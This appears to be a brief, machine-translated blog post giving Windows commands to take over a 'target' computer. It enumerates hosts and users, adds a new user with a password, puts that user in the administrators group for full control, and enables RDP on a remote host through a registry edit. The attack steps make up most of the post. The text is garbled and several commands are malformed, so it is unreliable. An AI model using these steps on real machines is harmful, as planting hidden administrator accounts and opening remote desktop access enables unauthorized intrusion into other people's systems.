Get Chitika | Premium
Custom Search

Comand RDP conection.

Comand RDP conection.
Hostname see the name / host computer
Ipconfig to see the computer ip
Net view to see the hostnames in a single network terShare
Net users to view a list of users in computer
net user (username) (password) / add to add the user into the list
Net localgroup administrators (username) / add to add users to the group administrator. to have full control of computer access rights.

if RDP is not enabled. You can activate it using the following comand:

@ reg add "\ \ contents hostname \ HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f

ket: REG_DWORD / d 0 / f
0 = RDP on
1 = RDP-off



so in essence we adduser on these windows.
1. net user USER PASS / add (ex. jatimcom jcomers net user / add)
2. net localgroup administrators USER / add (net localgroup jatimcom administrators / add)

done just that, check if open rdp port login directly if you have not opened using the open command in the post above. if port ping timeout just throw it I suggest the target, the chances are usually very small.

I hope many of the useful.

No comments:

Post a Comment